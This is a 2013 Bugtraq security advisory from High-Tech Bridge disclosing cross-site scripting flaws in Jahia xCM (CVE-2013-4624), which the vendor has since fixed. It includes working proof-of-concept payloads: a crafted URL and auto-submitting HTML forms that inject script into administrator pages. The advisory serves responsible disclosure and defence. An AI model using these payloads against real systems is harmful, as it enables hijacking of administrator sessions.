[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Multiple XSS Vulnerabilities in Jahia xCM
From: advisory () htbridge ! com
Date: 2013-07-31 10:43:52
Message-ID: 20130731104352.5668B2C4C0CF () htbridge ! ch
[Download RAW message or body]
Advisory ID: HTB23159
Product: Jahia xCM
Vendor: Jahia Solutions Group SA
Vulnerable Version(s): 6.6.1.0 r43343 and probably prior
Tested Version: 6.6.1.0 r43343
Vendor Notification: June 5, 2013
Vendor Patch: July 17, 2013
Public Disclosure: July 31, 2013
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2013-4624
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( \
https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in \
Jahia xCM, which can be exploited to perform cross-site scripting attacks against \
administrator of vulnerable application.
1) Multiple Cross-Site Scripting (XSS) Vulnerabilites in Jahia xCM: CVE-2013-4624
1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data \
in "site" HTTP GET parameter passed to "/engines/manager.jsp" script. A remote \
attacker can trick a logged-in administrator to open a specially crafted link and \
execute arbitrary HTML and script code in browser in context of the vulnerable \
website.
The exploitation example below uses JavaScript 'alert()' function to display \
administrator's cookies:
http://[host]/engines/manager.jsp?conf=repositoryexplorer&site=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
1.2 The vulnerability exists due to insufficient filtration of user-supplied data in \
"searchString" HTTP POST parameter passed to "/administration/" URI when "do=users" \
and "sub=search". A remote attacker can trick a logged-in administrator to open a \
specially crafted link and execute arbitrary HTML and script code in browser in \
context of the vulnerable website.
The exploitation example below uses JavaScript 'alert()' function to display \
administrator's cookies:
<form action="http://[host]/administration/?do=users&sub=search" method="post" \
name="main"> <input type="hidden" name="searchString" \
value="'><script>alert(document.cookie);</script>"> <input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
1.3 The vulnerability exists due to insufficient sanitisation of user-supplied data \
in "username", "manage-user-property#j:firstName", "manage-user-property#j:lastName", \
"manage-user-property#j:email" and "manage-user-property#j:organization" HTTP POST \
parameters passed to "/administration/" URI when "do=users" and "sub=processCreate". \
A remote attacker can trick a logged-in administrator to open a specially crafted \
link and execute arbitrary HTML and script code in browser in context of the \
vulnerable website.
The exploitation example below uses JavaScript 'alert()' function to display \
administrator's cookies:
<form action="http://[host]/administration/?do=users&sub=processCreate" method="post" \
name="main"> <input type="hidden" name="username" \
value="'><script>alert(document.cookie);</script>"> <input type="hidden" \
name="manage-user-property#j:firstName" \
value="'><script>alert(document.cookie);</script>"> <input type="hidden" \
name="manage-user-property#j:lastName" \
value="'><script>alert(document.cookie);</script>"> <input type="hidden" \
name="manage-user-property#j:email" \
value="'><script>alert(document.cookie);</script>"> <input type="hidden" \
name="manage-user-property#j:organization" \
value="'><script>alert(document.cookie);</script>"> <input type="hidden" \
name="actionType" value='save'> <input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
-----------------------------------------------------------------------------------------------
Solution:
Apply hotfix 7, that is available to all customers:
https://www.jahia.com/fr/home/support/customers-extranet/enterprise-jahia-downloads/jahia-xcm---version-66.html
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23159 - https://www.htbridge.com/advisory/HTB23159 - \
Multiple XSS Vulnerabilities in Jahia xCM. [2] Jahia xCM - http://www.jahia.com - \
Jahia xCM is the unified interface to access, personalize and manage best of breed \
WCM, portal and document management features. [3] Common Vulnerabilities and \
Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public \
use, CVE ® is a dictionary of publicly known information security vulnerabilities and \
exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to \
developers and security practitioners, CWE is a formal list of software weakness \
types.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without \
any warranty of any kind. Details of this Advisory may be updated in order to provide \
as accurate information as possible. The latest version of the Advisory is available \
on web page [1] in the References.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic